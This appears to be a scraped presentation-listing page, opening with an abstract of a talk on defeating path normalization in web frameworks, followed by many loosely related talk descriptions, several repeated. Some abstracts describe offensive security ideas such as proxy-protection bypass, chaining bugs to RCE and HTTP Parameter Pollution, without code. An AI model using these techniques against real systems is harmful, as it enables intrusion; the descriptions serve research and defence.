"We propose a new exploit technique that brings a whole-new attack surface to defeat path normalization, which is complicated in implementation due to many implicit properties and edge cases. This complication, being under-estimated or ignored by developers for a long time, has made our proposed attack vector possible, lethal, and general. Therefore, many 0days have been discovered via this approach in popular web frameworks written in trending programming languages, including Python, Ruby, Java, and JavaScript.
Being a very fundamental problem that exists in path normalization logic, sophisticated web frameworks can also suffer. For example, we've found various 0days on Java Spring Framework, Ruby on Rails, Next.js, and Python aiohttp, just to name a few. This general technique can also adapt to multi-layered web architecture, such as using Nginx or Apache as a proxy for Tomcat. In that case, reverse proxy protections can be bypassed. To make things worse, we're able to chain path normalization bugs to bypass authentication and achieve RCE in real world Bug Bounty Programs. Several scenarios will be demonstrated to illustrate how path normalization can be exploited to achieve sensitive information disclosure, SMB-Relay and RCE.
Understanding the basics of this technique, the audience won't be surprised to know that more than 10 vulnerabilities have been found in sophisticated frameworks and multi-layered web architectures aforementioned via this technique."
Chapitre 11: Expression Lambda et Référence de méthode en JavaAziz Darouichi
Voici le chapitre 11 sur les expressions lambda et les références de méthodes en Java.
Si vous avez des remarques ou suggestions afin de le parfaire.
N’hésitez pas à me contacter via mon email:
pr.azizdarouichi@gmail.com.
Bonne lecture.
The webinar will review a multi-layered framework for PostgreSQL security, with a deeper focus on limiting access to the database and data, as well as securing the data.
Using the popular AAA (Authentication, Authorization, Auditing) framework we will cover:
- Best practices for authentication (trust, certificate, MD5, Scram, etc).
- Advanced approaches, such as password profiles.
- Deep dive of authorization and data access control for roles, database objects (tables, etc), view usage, row-level security, and data redaction.
- Auditing, encryption, and SQL injection attack prevention.
Note: this session is delivered in German
Speaker:
Borys Neselovskyi, Sales Engineer, EDB
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
While input validation vulnerabilities such as XSS and SQL injection have been intensively studied, a new class of injection vulnerabilities called HTTP Parameter Pollution (HPP) has not received as much attention. HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If a web application does not properly sanitize the user input, a malicious user can compromise the logic of the application to perform either client-side or server-side attacks. One consequence of HPP attacks is that the attacker can potentially override existing hard-coded HTTP parameters to modify the behavior of an application, bypass input validation checkpoints, and access and possibly exploit variables that may be out of direct reach.
In the talk we present the first automated system for the detection of HPP vulnerabilities in real web applications. Our approach consists of injecting fuzzed parameters into the web application and a set of tests and heuristics to determine if the pages that are generated contain HPP vulnerabilities. We used this system to conduct a large-scale experiment by testing more than 5,000 popular websites and discovering unknown HPP flaws in many important and well-known sites such as Microsoft, Google, VMWare, Facebook, Symantec, Paypal and others. These sites have been all informed and many of them have acknowledged or fixed the problems. We will explain in details how to efficiently detect HPP bugs and how to prevent this novel class of injection vulnerabilities in future web applications.
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
In this talk, top ranked white-hat hacker Frans Rosén (@fransrosen) will focus on methodologies and results of attacking modern web technologies. He will do a deep-dive in postMessage, how vulnerable configurations in both AWS and Google Cloud allow attackers to take full control of your assets.
Listen to 60 minutes of new hacks, bug bounty stories and learnings that will make you realize that the protocols and policies you believed to be secure are most likely not.
10 years after the release of the original book Domain Driven Design by Eric Evans we are seeing more and more applications built on the core concepts of DDD. Still, there is a long way to go before we fully grasp all its potential. First we need to change the way we do things in our projects. In this session I will show a possible implementation in C# that I've been using in many projects.
How do you measure the quality of your code? Performance and testing are just one aspect of code, in order to meet deadlines and make maintenance quicker you also need your code to be readable, decoupled and generally easier to comprehend and work with. This talk will go over tips and exercises to help you identify trouble areas, refactor them and train you to write better code in future projects. Come make your code look and function better.
Chapitre 11: Expression Lambda et Référence de méthode en JavaAziz Darouichi
Voici le chapitre 11 sur les expressions lambda et les références de méthodes en Java.
Si vous avez des remarques ou suggestions afin de le parfaire.
N’hésitez pas à me contacter via mon email:
pr.azizdarouichi@gmail.com.
Bonne lecture.
The webinar will review a multi-layered framework for PostgreSQL security, with a deeper focus on limiting access to the database and data, as well as securing the data.
Using the popular AAA (Authentication, Authorization, Auditing) framework we will cover:
- Best practices for authentication (trust, certificate, MD5, Scram, etc).
- Advanced approaches, such as password profiles.
- Deep dive of authorization and data access control for roles, database objects (tables, etc), view usage, row-level security, and data redaction.
- Auditing, encryption, and SQL injection attack prevention.
Note: this session is delivered in German
Speaker:
Borys Neselovskyi, Sales Engineer, EDB
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
While input validation vulnerabilities such as XSS and SQL injection have been intensively studied, a new class of injection vulnerabilities called HTTP Parameter Pollution (HPP) has not received as much attention. HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If a web application does not properly sanitize the user input, a malicious user can compromise the logic of the application to perform either client-side or server-side attacks. One consequence of HPP attacks is that the attacker can potentially override existing hard-coded HTTP parameters to modify the behavior of an application, bypass input validation checkpoints, and access and possibly exploit variables that may be out of direct reach.
In the talk we present the first automated system for the detection of HPP vulnerabilities in real web applications. Our approach consists of injecting fuzzed parameters into the web application and a set of tests and heuristics to determine if the pages that are generated contain HPP vulnerabilities. We used this system to conduct a large-scale experiment by testing more than 5,000 popular websites and discovering unknown HPP flaws in many important and well-known sites such as Microsoft, Google, VMWare, Facebook, Symantec, Paypal and others. These sites have been all informed and many of them have acknowledged or fixed the problems. We will explain in details how to efficiently detect HPP bugs and how to prevent this novel class of injection vulnerabilities in future web applications.
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
In this talk, top ranked white-hat hacker Frans Rosén (@fransrosen) will focus on methodologies and results of attacking modern web technologies. He will do a deep-dive in postMessage, how vulnerable configurations in both AWS and Google Cloud allow attackers to take full control of your assets.
Listen to 60 minutes of new hacks, bug bounty stories and learnings that will make you realize that the protocols and policies you believed to be secure are most likely not.
10 years after the release of the original book Domain Driven Design by Eric Evans we are seeing more and more applications built on the core concepts of DDD. Still, there is a long way to go before we fully grasp all its potential. First we need to change the way we do things in our projects. In this session I will show a possible implementation in C# that I've been using in many projects.
How do you measure the quality of your code? Performance and testing are just one aspect of code, in order to meet deadlines and make maintenance quicker you also need your code to be readable, decoupled and generally easier to comprehend and work with. This talk will go over tips and exercises to help you identify trouble areas, refactor them and train you to write better code in future projects. Come make your code look and function better.
Ce cours présente la notion de qualité de code et comment il est possible de l'évaluer grâce à des métriques mesurables. Après avoir présenté plusieurs métriques standards, il se concentrer sur des aspects de qualité de code spécifique à l'orienté objet et présente les cinq concepts de l'orienté objet. La deuxième partie du cours présente plusieurs bonnes pratiques à avoir en programmation orientée objet, sur base d'exemples concrets.
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
The document outlines a methodology for effectively finding security vulnerabilities in web applications through bug hunting. It covers discovery techniques like using search engines and subdomain enumeration tools. It then discusses mapping the application by directory brute forcing and vulnerability discovery. Specific vulnerability classes covered include XSS, SQLi, file uploads, LFI/RFI, and CSRF. The document provides resources for each vulnerability type and recommends tools that can help automate the testing process.
Interface fonctionnelle, Lambda expression, méthode par défaut, référence de...MICHRAFY MUSTAFA
Ce document vise à présenter java 8 et lambda expression.
Les points abordés sont les interfaces fonctionnelles, fonction d'ordre supérieur, lambda expression, référence de méthode et méthode par défaut. Chaque notion est accompagnée par des exemples. Les codes sources seront disponibles sur git.
Pentest ekiplerinin kullandığı Kali dağıtımı ile Linux dünyasına giriş dökümanıdır. Bu döküman; güvenlik alanına giriş yapmak isteyen insanların Türkçe kaynak problemini gidermeyi amaçlayarak hazırlanmıştır. Bu açık kaynak projesine katkı sağlamak isteyen gönüllü linux kullanıcıları ise bize ulaşabilirler. Yazım hatası, anlam karmaşası, yanlış bilgi veya iyileştirmeler için mehmet.ince@intelrad.com adresine mail atabilirsiniz. İyi çalışmalar.
PostgreSQL_ Up and Running_ A Practical Guide to the Advanced Open Source Dat...MinhLeNguyenAnh2
This document provides an overview and introduction to the third edition of the book "PostgreSQL: Up and Running" by Regina O. Obe and Leo S. Hsu. The summary includes a brief description of the book's contents, intended audience, and additional PostgreSQL resources for readers.
Java 8, Streams & Collectors, patterns, performances and parallelizationJosé Paumard
This document discusses Java 8 streams and collectors. It provides an overview of streams, operations on streams like forEach(), filter(), and peek(), and functional interfaces like Consumer and Predicate. It notes that streams efficiently process data in a parallel and pipelined manner without storing intermediate data. Key points covered include what streams are, how to create them from collections, common stream operations, and issues around concurrency with mutable operations.
Kyo is a next-generation effect system that introduces an approach based on algebraic effects to deliver straightforward APIs in the pure Functional Programming paradigm. Unlike similar solutions, Kyo achieves this without inundating developers with esoteric concepts from Category Theory or using cryptic symbolic operators. This results in a development experience that is both intuitive and robust.
Kyo generalizes the innovative effect rotation mechanism introduced by ZIO. While ZIO restricts effects to two channels, namely dependency injection and short-circuiting, Kyo allows for an arbitrary number of effectful channels. This enhancement offers developers greater flexibility in effect management and simplifies Kyo's internal codebase through more principled design patterns.
In addition to this novel approach to effect handling, Kyo provides seamless direct syntax inspired by Monadless and a comprehensive set of built-in effects like Aborts for short-circuiting, Envs for dependency injection, and Fibers for green threads with fine-grained uncooperative preemption.
After over two years in development, the first public release of the project will be made during Functional Scala 2023. Attendees will also be treated to benchmark results that showcase Kyo's unparalleled performance.
Big Data : Hadoop
- Généralité
- Architecture HDFS
- Algorithme MapRduce
- Architecture YARN
- Hadoop v3.x vs Hadoopv2.x
Cours Big Data - Chap2 - GI3 - ENIS
Stratégies d’optimisation de requêtes SQL dans un écosystème HadoopSébastien Frackowiak
Le Big Data n’est plus un « buzzword », il est devenu au fil de ces dernières années une réalité. Ainsi, il n’est plus rare que les grandes entreprises disposent d’un « puits de données » contenant une énorme quantité d’informations. C’est le cas d’Orange qui utilise Hadoop.
Dans ce cadre, le moyen le plus courant de programmer des traitements Big Data est d’utiliser Hive qui émule le langage SQL. Mais cette émulation peut être trompeuse car ses mécanismes sous-jacents sont radicalement différents de ceux que nous connaissons bien, ils cachent l’utilisation du paradigme MapReduce. Popularisé par Google, ce paradigme réussit à traiter de gigantesques volumes de données de manière distribuée. C’est son fonctionnement et son application au SQL qui seront détaillés dans ce mémoire afin de pouvoir proposer des stratégies d’optimisation des requêtes.
Il en ressortira qu’une bonne optimisation ne peut se faire sans connaissance fine des données manipulées et étude statistique préalable. Mais surtout, que la multitude d’options et de techniques d’optimisation proposées au développeur nécessiteraient de sa part une compétence similaire à celle d’un administrateur de base de données. C’est l’évolution de cet aspect qui conditionnera l’avenir de Hadoop et de Hive.
Support cours : Vos premiers pas avec le pare feu CISCO ASASmartnSkilled
Mettez en œuvre la sécurité avec les firewalls Cisco asa.
SmartnSkilled vous offre l’occasion par le biais de cette formation vidéo Cisco ASA, pour découvrir, préparer et configurer le pare feu ASA et d'acquérir toutes les connaissances nécessaires au déploiement et au maintien d'une solution de sécurité basée sur Cisco ASA.
Formation en ligne par ici :
https://www.smartnskilled.com/tutoriel/formation-en-ligne-vos-premiers-pas-avec-le-pare-feu-cisco-asa
API Security - OWASP top 10 for APIs + tips for pentestersInon Shkedy
The document discusses modern application security issues related to APIs. It begins with an overview of common API security risks like SQL injection, XSS, and CSRF. It then focuses on how application security has changed with the transition to modern architectures that are API-focused, use cloud infrastructure, and follow DevOps practices. Key changes discussed include less abstraction layers, clients handling more responsibility, and APIs exposing more data and endpoints directly. The document also summarizes the OWASP API security project and proposed API security top 10 risks. Real attack examples are provided to illustrate broken authorization and authentication vulnerabilities.
Pour accéder aux fichiers nécessaires pour faire ce TP, visitez: https://drive.google.com/folderview?id=0Bz7DokLRQvx7M2JWZEt1VHdwSE0&usp=sharing
Pour plus de contenu, Visitez http://liliasfaxi.wix.com/liliasfaxi !
A story of the passive aggressive sysadmin of AEMFrans Rosén
# By Frans Rosén
Adobe Experience Manager is an enterprise CMS with a troubled history. It was created with the angle of high customization factor, enabling consulting firms to deploy it all over the world for huge customers.
Then came security.
Frans will go through some terrible default configuration mistakes, Adobe’s love for bad Flash and how a sysadmin accidentialy exposed an international multi billion dollar company using only sad thoughts.
# About speaker
Frans Rosén is a tech entrepreneur, bug bounty hunter and a Security Advisor at Detectify, a security service for developers. He’s a frequent blogger at Detectify Labs and a top ranked participant of bug bounty programs, receiving some of the highest bounty payouts ever on HackerOne.
Frans was recently featured as #2 on Hackread’s list of 10 Famous Bug Bounty Hunters of All Time and the results of his security research has been covered in numerous international publications such as Observer, BBC, Ars Technica, Wired and Mashable.
The site was slow. CPU and memory usage everywhere! Some dead objects in the corner. Something terrible must have happened! We have some IIS logs. Some traces from a witness. But not enough to find out what was wrong. In this session, we’ll see how effective telemetry, a profiler or two as well as a refresher of how IIS runs our ASP.NET web applications can help solve this server murder mystery.
Sherlock Homepage - A detective story about running large web services (VISUG...Maarten Balliauw
The site was slow. CPU and memory usage everywhere! Some dead objects in the corner. Something terrible must have happened! We have some IIS logs. Some traces from a witness. But not enough to find out what was wrong. In this session, we’ll see how effective telemetry, a profiler or two as well as a refresher of how IIS runs our ASP.NET web applications can help solve this server murder mystery.
Ce cours présente la notion de qualité de code et comment il est possible de l'évaluer grâce à des métriques mesurables. Après avoir présenté plusieurs métriques standards, il se concentrer sur des aspects de qualité de code spécifique à l'orienté objet et présente les cinq concepts de l'orienté objet. La deuxième partie du cours présente plusieurs bonnes pratiques à avoir en programmation orientée objet, sur base d'exemples concrets.
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
The document outlines a methodology for effectively finding security vulnerabilities in web applications through bug hunting. It covers discovery techniques like using search engines and subdomain enumeration tools. It then discusses mapping the application by directory brute forcing and vulnerability discovery. Specific vulnerability classes covered include XSS, SQLi, file uploads, LFI/RFI, and CSRF. The document provides resources for each vulnerability type and recommends tools that can help automate the testing process.
Interface fonctionnelle, Lambda expression, méthode par défaut, référence de...MICHRAFY MUSTAFA
Ce document vise à présenter java 8 et lambda expression.
Les points abordés sont les interfaces fonctionnelles, fonction d'ordre supérieur, lambda expression, référence de méthode et méthode par défaut. Chaque notion est accompagnée par des exemples. Les codes sources seront disponibles sur git.
Pentest ekiplerinin kullandığı Kali dağıtımı ile Linux dünyasına giriş dökümanıdır. Bu döküman; güvenlik alanına giriş yapmak isteyen insanların Türkçe kaynak problemini gidermeyi amaçlayarak hazırlanmıştır. Bu açık kaynak projesine katkı sağlamak isteyen gönüllü linux kullanıcıları ise bize ulaşabilirler. Yazım hatası, anlam karmaşası, yanlış bilgi veya iyileştirmeler için mehmet.ince@intelrad.com adresine mail atabilirsiniz. İyi çalışmalar.
PostgreSQL_ Up and Running_ A Practical Guide to the Advanced Open Source Dat...MinhLeNguyenAnh2
This document provides an overview and introduction to the third edition of the book "PostgreSQL: Up and Running" by Regina O. Obe and Leo S. Hsu. The summary includes a brief description of the book's contents, intended audience, and additional PostgreSQL resources for readers.
Java 8, Streams & Collectors, patterns, performances and parallelizationJosé Paumard
This document discusses Java 8 streams and collectors. It provides an overview of streams, operations on streams like forEach(), filter(), and peek(), and functional interfaces like Consumer and Predicate. It notes that streams efficiently process data in a parallel and pipelined manner without storing intermediate data. Key points covered include what streams are, how to create them from collections, common stream operations, and issues around concurrency with mutable operations.
Kyo is a next-generation effect system that introduces an approach based on algebraic effects to deliver straightforward APIs in the pure Functional Programming paradigm. Unlike similar solutions, Kyo achieves this without inundating developers with esoteric concepts from Category Theory or using cryptic symbolic operators. This results in a development experience that is both intuitive and robust.
Kyo generalizes the innovative effect rotation mechanism introduced by ZIO. While ZIO restricts effects to two channels, namely dependency injection and short-circuiting, Kyo allows for an arbitrary number of effectful channels. This enhancement offers developers greater flexibility in effect management and simplifies Kyo's internal codebase through more principled design patterns.
In addition to this novel approach to effect handling, Kyo provides seamless direct syntax inspired by Monadless and a comprehensive set of built-in effects like Aborts for short-circuiting, Envs for dependency injection, and Fibers for green threads with fine-grained uncooperative preemption.
After over two years in development, the first public release of the project will be made during Functional Scala 2023. Attendees will also be treated to benchmark results that showcase Kyo's unparalleled performance.
Big Data : Hadoop
- Généralité
- Architecture HDFS
- Algorithme MapRduce
- Architecture YARN
- Hadoop v3.x vs Hadoopv2.x
Cours Big Data - Chap2 - GI3 - ENIS
Stratégies d’optimisation de requêtes SQL dans un écosystème HadoopSébastien Frackowiak
Le Big Data n’est plus un « buzzword », il est devenu au fil de ces dernières années une réalité. Ainsi, il n’est plus rare que les grandes entreprises disposent d’un « puits de données » contenant une énorme quantité d’informations. C’est le cas d’Orange qui utilise Hadoop.
Dans ce cadre, le moyen le plus courant de programmer des traitements Big Data est d’utiliser Hive qui émule le langage SQL. Mais cette émulation peut être trompeuse car ses mécanismes sous-jacents sont radicalement différents de ceux que nous connaissons bien, ils cachent l’utilisation du paradigme MapReduce. Popularisé par Google, ce paradigme réussit à traiter de gigantesques volumes de données de manière distribuée. C’est son fonctionnement et son application au SQL qui seront détaillés dans ce mémoire afin de pouvoir proposer des stratégies d’optimisation des requêtes.
Il en ressortira qu’une bonne optimisation ne peut se faire sans connaissance fine des données manipulées et étude statistique préalable. Mais surtout, que la multitude d’options et de techniques d’optimisation proposées au développeur nécessiteraient de sa part une compétence similaire à celle d’un administrateur de base de données. C’est l’évolution de cet aspect qui conditionnera l’avenir de Hadoop et de Hive.
Support cours : Vos premiers pas avec le pare feu CISCO ASASmartnSkilled
Mettez en œuvre la sécurité avec les firewalls Cisco asa.
SmartnSkilled vous offre l’occasion par le biais de cette formation vidéo Cisco ASA, pour découvrir, préparer et configurer le pare feu ASA et d'acquérir toutes les connaissances nécessaires au déploiement et au maintien d'une solution de sécurité basée sur Cisco ASA.
Formation en ligne par ici :
https://www.smartnskilled.com/tutoriel/formation-en-ligne-vos-premiers-pas-avec-le-pare-feu-cisco-asa
API Security - OWASP top 10 for APIs + tips for pentestersInon Shkedy
The document discusses modern application security issues related to APIs. It begins with an overview of common API security risks like SQL injection, XSS, and CSRF. It then focuses on how application security has changed with the transition to modern architectures that are API-focused, use cloud infrastructure, and follow DevOps practices. Key changes discussed include less abstraction layers, clients handling more responsibility, and APIs exposing more data and endpoints directly. The document also summarizes the OWASP API security project and proposed API security top 10 risks. Real attack examples are provided to illustrate broken authorization and authentication vulnerabilities.
Pour accéder aux fichiers nécessaires pour faire ce TP, visitez: https://drive.google.com/folderview?id=0Bz7DokLRQvx7M2JWZEt1VHdwSE0&usp=sharing
Pour plus de contenu, Visitez http://liliasfaxi.wix.com/liliasfaxi !
A story of the passive aggressive sysadmin of AEMFrans Rosén
# By Frans Rosén
Adobe Experience Manager is an enterprise CMS with a troubled history. It was created with the angle of high customization factor, enabling consulting firms to deploy it all over the world for huge customers.
Then came security.
Frans will go through some terrible default configuration mistakes, Adobe’s love for bad Flash and how a sysadmin accidentialy exposed an international multi billion dollar company using only sad thoughts.
# About speaker
Frans Rosén is a tech entrepreneur, bug bounty hunter and a Security Advisor at Detectify, a security service for developers. He’s a frequent blogger at Detectify Labs and a top ranked participant of bug bounty programs, receiving some of the highest bounty payouts ever on HackerOne.
Frans was recently featured as #2 on Hackread’s list of 10 Famous Bug Bounty Hunters of All Time and the results of his security research has been covered in numerous international publications such as Observer, BBC, Ars Technica, Wired and Mashable.
The site was slow. CPU and memory usage everywhere! Some dead objects in the corner. Something terrible must have happened! We have some IIS logs. Some traces from a witness. But not enough to find out what was wrong. In this session, we’ll see how effective telemetry, a profiler or two as well as a refresher of how IIS runs our ASP.NET web applications can help solve this server murder mystery.
Sherlock Homepage - A detective story about running large web services (VISUG...Maarten Balliauw
The site was slow. CPU and memory usage everywhere! Some dead objects in the corner. Something terrible must have happened! We have some IIS logs. Some traces from a witness. But not enough to find out what was wrong. In this session, we’ll see how effective telemetry, a profiler or two as well as a refresher of how IIS runs our ASP.NET web applications can help solve this server murder mystery.
This document discusses asynchronous I/O in Java and Scala using the Play Framework. It describes how LinkedIn uses a service-oriented architecture with hundreds of services making requests to each other. It then covers how Play supports non-blocking I/O using asynchronous code, promises, and futures to allow parallel requests without blocking threads. Key points covered include using map and flatMap to transform promises and futures, handling errors and timeouts, and the benefits of non-blocking I/O for scalability.
Sherlock Homepage - A detective story about running large web services - WebN...Maarten Balliauw
The site was slow. CPU and memory usage everywhere! Some dead objects in the corner. Something terrible must have happened! We have some IIS logs. Some traces from a witness. But not enough to find out what was wrong. In this session, we’ll see how effective telemetry, a profiler or two as well as a refresher of how IIS runs our ASP.NET web applications can help solve this server murder mystery.
This document provides an introduction to Node.js, a framework for building scalable server-side applications with asynchronous JavaScript. It discusses what Node.js is, how it uses non-blocking I/O and events to avoid wasting CPU cycles, and how external Node modules help create a full JavaScript stack. Examples are given of using Node modules like Express for building RESTful APIs and Socket.IO for implementing real-time features like chat. Best practices, limitations, debugging techniques and references are also covered.
This document summarizes potential vulnerabilities in how different layers of a web application process data. It discusses how each layer - including hardware, operating system, browser, network, web server, framework, application and database - accepts inputs and produces outputs that could be leveraged maliciously if not properly validated. Many real-world examples are provided of how inputs passed between layers can bypass validation checks if the layers' data processing rules are not well understood by developers. The key message is that all variables not explicitly set in code should be considered untrusted.
Станислав Сидоренко «DeviceHive Java Server – миграция на Spring Boot»DataArt
The document discusses migrating the DeviceHive Java server from a Java EE implementation to a Spring Boot implementation. It describes DeviceHive as an open-source M2M framework that allows two-way communication with remote devices using cloud middleware. It then outlines some of the key components in the existing Java EE implementation and how they would map to Spring and Spring Boot, including using Spring MVC instead of JAX-RS, Spring services instead of EJBs, and deploying to Tomcat instead of a full Java EE server. It also discusses features of Spring Boot like easy deployment of standalone applications and auto-configuration of common dependencies.
The document discusses OWASP Zed Attack Proxy (ZAP), a free and open source web application security scanner. It can be used by pentesters, developers, and testers to detect vulnerabilities. ZAP passively and actively scans applications to find issues. It can be integrated into CI/CD pipelines and automated with APIs, command line tools, and programming libraries. The document provides examples of using ZAP to perform passive scanning, active scanning, and automation for testers.
This document provides an overview of a hands-on workshop on the Constrained Application Protocol (CoAP). It outlines the agenda which includes introductions to CoAP, the Californium CoAP framework, and hands-on projects. Attendees will work through example CoAP client and server code using the Californium libraries and test their implementations. Advanced CoAP topics like security, proxies, and resource directories are also discussed.
This document contains an agenda and slides for a presentation on Spring Boot. The presentation introduces Spring Boot, which allows developers to rapidly build production-grade Spring applications with minimal configuration. It demonstrates how to quickly create a "Hello World" application using Spring Boot and discusses some of the features it provides out-of-the-box like embedded servers and externalized configuration. The presentation also shows how to add additional functionality like Thymeleaf templates and actuator endpoints to monitor and manage applications.
Talk at RubyKaigi 2015.
Plugin architecture is known as a technique that brings extensibility to a program. Ruby has good language features for plugins. RubyGems.org is an excellent platform for plugin distribution. However, creating plugin architecture is not as easy as writing code without it: plugin loader, packaging, loosely-coupled API, and performance. Loading two versions of a gem is a unsolved challenge that is solved in Java on the other hand.
I have designed some open-source software such as Fluentd and Embulk. They provide most of functions by plugins. I will talk about their plugin-based architecture.
This document summarizes how to test Java web applications on mobile devices using Arquillian and Selenium. It describes setting up Android emulators, configuring the Arquillian extension for AndroidDriver, and writing sample unit and functional tests for a mobile web application using Page Object Model patterns and the WebDriver API. Tips are provided for debugging tests, capturing screenshots on failure, and integrating tests with Jenkins.
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
Slides from "Web Applications Automated Security Testing in a Continuous Delivery Pipeline" workshop, made during Drupal Developers Days 2017 at Seville, Spain
This document discusses approaches to managing architecture for Java and Spring applications. It covers topics like granularity of modules, layers and slices; using packages and code analysis tools to enforce architecture; a plain Java approach using packages and visibility; and the Hera plugin system for localizing change and enabling flexibility. Hera is a small plugin registry that allows selecting plugins based on criteria and callbacks to extend functionality in a modular way.
Sherlock Homepage - A detective story about running large web services - NDC ...Maarten Balliauw
The site was slow. CPU and memory usage everywhere! Some dead objects in the corner. Something terrible must have happened! We have some IIS logs. Some traces from a witness. But not enough to find out what was wrong. In this session, we’ll see how effective telemetry, a profiler or two as well as a refresher of how IIS runs our ASP.NET web applications can help solve this server murder mystery.
High-level Programming Languages: Apache Pig and Pig LatinPietro Michiardi
This slide deck is used as an introduction to the Apache Pig system and the Pig Latin high-level programming language, as part of the Distributed Systems and Cloud Computing course I hold at Eurecom.
Course website:
http://michiard.github.io/DISC-CLOUD-COURSE/
Sources available here:
https://github.com/michiard/DISC-CLOUD-COURSE
This document summarizes potential vulnerabilities in how different layers of a web application process data. It discusses how each layer - including hardware, operating system, browser, network, web server, framework, application and database - accepts inputs and produces outputs that could be leveraged maliciously if not properly validated. The key point is that inputs may come from sources beyond just user input, and outputs may contain sensitive information, so all data processed across layers needs to be carefully validated. Specific examples are provided of vulnerabilities the author has discovered in how various popular systems handle specific inputs or transformations at each layer.
Everything you wanted to know about writing async, concurrent http apps in java Baruch Sadogursky
As presented at CodeMotion Tel Aviv:
Facing tens of millions of clients continuously downloading binaries from its repositories, JFrog decided to offer an OSS client that natively supports these downloads. This session shares the main challenges of developing a highly concurrent, resumable, async download library on top of an Apache HTTP client. It also covers other libraries JFrog tested and why it decided to reinvent the wheel. Consider yourself forewarned: lots of HTTP internals, NIO, and concurrency ahead!
Similar to Breaking Parser Logic: Take Your Path Normalization Off and Pop 0days Out! (20)
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
Key Discussion Pointers:
1. Introduction to Data Privacy
- What is data privacy
- Privacy laws around the globe
- DPDPA Journey
2. Understanding the New Indian DPDPA 2023
- Objectives
- Principles of DPDPA
- Applicability
- Rights & Duties of Individuals
- Principals
- Legal implications/penalties
3. A practical approach to DPDPA compliance
- Personal data Inventory
- DPIA
- Risk treatment
The Verizon Breach Investigation Report (VBIR) is an annual report analyzing cybersecurity incidents based on real-world data. It categorizes incidents and identifies emerging trends, threat actors, motivations, attack vectors, affected industries, common attack patterns, and recommendations. Each report provides the latest insights and data to give organizations a global perspective on evolving cyber threats.
The document summarizes the top 10 cybersecurity risks presented to the board of directors of a manufacturing company. It discusses each risk such as insider threats, cloud security, ransomware attacks, third party risks, and data security. For each risk, it provides the current posture in terms of controls, compliance level, and planned improvements. The CISO and other leaders such as the managing director, finance director, and chief risk officer attended the presentation.
Simplifying data privacy and protection.pdfPriyanka Aash
1) Data is growing exponentially which increases the risk and impact of data breaches, while compliance requirements are also becoming more stringent.
2) IBM Security Guardium helps customers address this by discovering, classifying, and protecting sensitive data across platforms and simplifying compliance.
3) It detects threats in real-time, increases data security accuracy, and reduces the time spent on audits and issue remediation, helping customers minimize the impact of potential data breaches and address local compliance requirements.
Generative AI and Security (1).pptx.pdfPriyanka Aash
Generative AI and Security Testing discusses generative AI, including its definition as a subset of AI focused on generating content similar to human creations. The document outlines the evolution of generative AI from artificial neural networks to modern models like GPT, GANs, and VAEs. It provides examples of different types of generative AI like text, image, audio, and video generation. The document proposes potential uses of generative AI like GPT for security testing tasks such as malware generation, adversarial attack simulation, and penetration testing assistance.
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
The document discusses shifting the focus in cybersecurity from vulnerability management to weakness management and attack surface management. It argues that attacks persist because approaches focus only on software vulnerabilities, while ignoring other weaknesses like technological, people and process weaknesses that expand the potential attack surface. A new approach is needed that takes a holistic view of all weaknesses and continuously monitors the entire attack surface to better prevent attacks.
The document summarizes key aspects of the proposed Digital Personal Data Protection Act 2023 in India, including its scope, definitions, obligations of data fiduciaries, grounds for processing personal data, notice requirements for data principals, and penalties for non-compliance. It outlines categories of entities that would be considered significant data fiduciaries and the additional obligations that would apply to them. The summary also compares some aspects of the proposed Indian law to the General Data Protection Regulation (GDPR) in the European Union.
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
This document discusses cybersecurity threats and SentinelOne's solutions. It begins with questions about an organization's cyber preparedness and budget. It then discusses the cat-and-mouse game between attackers and defenders. The document highlights growing ransomware threats and payments. It argues SentinelOne provides a unified security solution that lowers costs, risks, and complexity while improving detection and response. It shares industry recognition for SentinelOne and concludes by thanking the audience.
An IT systems outage and distributed denial of service (DDoS) attack impacted an organization called XYZ Ltd. This was followed by a ransom demand email from an anonymous sender threatening to release sensitive project data. When the ransom deadline passed, anonymous hackers released a video on social media and the data breach began receiving media coverage. A customer then contacted XYZ to inquire about the data leak and if their content was impacted. The document outlines discussions between teams at XYZ on responding to the cyber incident and lessons learned.
The CISO Platform is a 10+ year old dedicated social platform for CISOs and senior IT security leaders that has grown to over 40,000 members across 20+ countries. Through sharing and collaboration, the community has created over 500 checklists, frameworks, and playbooks that are available for free to members. The platform also hosts an annual security conference with over 100 speakers and 20 workshops attended by 20,000 people. The goal of the CISO Platform is to build tangible community goods and resources through open sharing and collaboration among security professionals.
This document provides updates from the Chennai Chapter of the CISO Platform for 2021. It discusses the following:
1. The Breach and Attack Summit held in December which included panel discussions, presentations, task forces, and workshops despite natural disasters, with over 200 attendees.
2. Chapter meetings focused on ransomware trends and lessons learned from attacks.
3. A kids initiative to promote cybersecurity awareness through sessions for students, parents and teachers at local schools.
4. The task forces focused on topics like cyber risk quantification, quantum computing, cyber insurance and privacy.
It covers popular IaaS/PaaS attack vectors, list them, and map to other relevant projects such as STRIDE & MITRE. Security professionals can better understand what are the common attack vectors that are utilized in attacks, examples for previous events, and where they should focus their controls and security efforts.
Discuss Security Incidents & Business Use Case, Understanding Web 3 Pros
and Web 3 Cons. Prevention mechanism and how to make sure that it doesn’t happen to you?
Lessons Learned From Ransomware AttacksPriyanka Aash
The document summarizes a ransomware attack experienced by the author's organization and the lessons learned. It describes how the ransomware encrypted files and powered off virtual machines. It then details the recovery process over several days, including bringing in an incident response firm, rebuilding infrastructure, and restoring service for customers. Key lessons included having stronger access controls, backups stored separately, and implementing security tools like EDR, centralized logging, and identity management best practices.
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
Round Table Discussion On "Emerging New Threats And Top CISO Priorities In 2022"_ Bangalore
Date - 28 September, 2022. Decision Makers of different organizations joined this discussion and spoke on New Threats & Top CISO Priorities
